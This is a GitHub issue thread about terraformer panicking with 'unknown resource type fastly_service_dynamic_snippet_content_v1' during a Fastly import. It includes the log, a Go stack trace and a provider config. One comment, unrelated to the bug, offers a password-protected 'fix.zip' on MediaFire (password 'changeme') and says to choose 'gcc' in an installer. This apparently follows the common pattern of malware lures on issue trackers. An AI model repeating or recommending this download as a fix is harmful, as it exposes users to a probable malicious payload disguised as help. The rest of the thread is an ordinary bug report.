### ISSUE TITLE
Fastly provider panics on unknown resource

### ISSUE THREAD

**Issue by JacobCoffee** [GoogleCloudPlatform/terraformer#1912]
Similar to an old issue (#1688), **panic: unknown resource type fastly_service_dynamic_snippet_content_v1**

```
set -x FASTLY_API_KEY $KEY
set -x FASTLY_CUSTOMER_ID $CUSTOMER
✗ terraformer import fastly -r service_v1 --filter=service_v1=$SERVICE_ID

2024/08/26 09:39:22 fastly importing... service_v1
2024/08/26 09:39:52 fastly done importing service_v1
2024/08/26 09:39:52 Number of resources for service service_v1: 13
2024/08/26 09:39:52 Refreshing state... fastly_service_v1.tfer--$SERVICE_ID
2024/08/26 09:39:52 Refreshing state... fastly_service_dynamic_snippet_content_v1.tfer--pfbHaNzazzkJxE93g1JpX4
2024/08/26 09:39:52 Refreshing state... fastly_service_acl_entries_v1.tfer--6Xx3rqKOY0FjQ2CuoS9D8I
2024/08/26 09:39:52 Refreshing state... fastly_service_dynamic_snippet_content_v1.tfer--ucSpWOKjEJHysgx7zZkik5
2024/08/26 09:39:52 Refreshing state... fastly_service_compute.tfer--UzGHPKfEwxF08Q9LwKhv53
2024/08/26 09:39:52 Refreshing state... fastly_service_dynamic_snippet_content_v1.tfer--rH9fqqFu2l29t8DsUGCx41
2024/08/26 09:39:52 Refreshing state... fastly_service_dictionary_items_v1.tfer--rMHjtEbbsqjHZjPBGNASy6
2024/08/26 09:39:52 Refreshing state... fastly_service_dynamic_snippet_content_v1.tfer--VajG53YDslfpx0UChiKov5
2024/08/26 09:39:52 Refreshing state... fastly_service_dictionary_items_v1.tfer--4qI0VMZiX9sqMinHkAYoe1
2024/08/26 09:39:52 Refreshing state... fastly_service_compute.tfer--CnsNqIdpSj1tZNLTl6PUi4
2024/08/26 09:39:52 Refreshing state... fastly_service_dictionary_items_v1.tfer--Jd4EAU2bksO552sF4aRYT6
2024/08/26 09:39:52 Refreshing state... fastly_service_acl_entries_v1.tfer--6NbcU91bEi1GnPcSqwqb9a
2024/08/26 09:39:52 Refreshing state... fastly_service_dictionary_items_v1.tfer--3LaPK35xPW6QPOaLCTiyU9
panic: unknown resource type fastly_service_dynamic_snippet_content_v1

goroutine 1185 [running]:
github.com/hashicorp/terraform/plugin.(*GRPCProvider).getResourceSchema(0x1400021e900?, {0x10cb07f03, 0x29})
        github.com/hashicorp/terraform@v0.12.31/plugin/grpc_provider.go:92 +0xc8
github.com/hashicorp/terraform/plugin.(*GRPCProvider).ReadResource(0x14000fbac40, {{0x10cb07f03, 0x29}, {{{0x10fe2d7c8, 0x14002084100}}, {0x10e732dc0, 0x14002092390}}, {0x11651b300, 0x0, 0x0}})
        github.com/hashicorp/terraform@v0.12.31/plugin/grpc_provider.go:321 +0xbc
github.com/GoogleCloudPlatform/terraformer/terraformutils/providerwrapper.(*ProviderWrapper).Refresh(0x14000f9abd0, 0x140007f9d60, 0x140007f9d10)
        github.com/GoogleCloudPlatform/terraformer/terraformutils/providerwrapper/provider.go:171 +0x318
github.com/GoogleCloudPlatform/terraformer/terraformutils.(*Resource).Refresh(0x140019b43f0, 0x0?)
        github.com/GoogleCloudPlatform/terraformer/terraformutils/resource.go:130 +0x50
github.com/GoogleCloudPlatform/terraformer/terraformutils.RefreshResourceWorker(0x0?, 0x104dfada4?, 0x14001b36f60?)
        github.com/GoogleCloudPlatform/terraformer/terraformutils/utils.go:153 +0xc8
created by github.com/GoogleCloudPlatform/terraformer/terraformutils.RefreshResources in goroutine 1
        github.com/GoogleCloudPlatform/terraformer/terraformutils/utils.go:80 +0xb4
```
`providers.tf`
```tf
terraform {
  required_providers {
    fastly = {
      source = "fastly/fastly"
    }
  }
}

provider "fastly" {}
```

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ganesh-singhh** [comment]
I'm also getting the same:

<img width="1299" alt="image" src="https://github.com/user-attachments/assets/be669c79-4332-4145-a8f6-e6d94cfcb143">
<img width="1299" alt="image" src="https://github.com/user-attachments/assets/be669c79-4332-4145-a8f6-e6d94cfcb143">
<img width="1299" alt="image" src="https://github.com/user-attachments/assets/be669c79-4332-4145-a8f6-e6d94cfcb143">
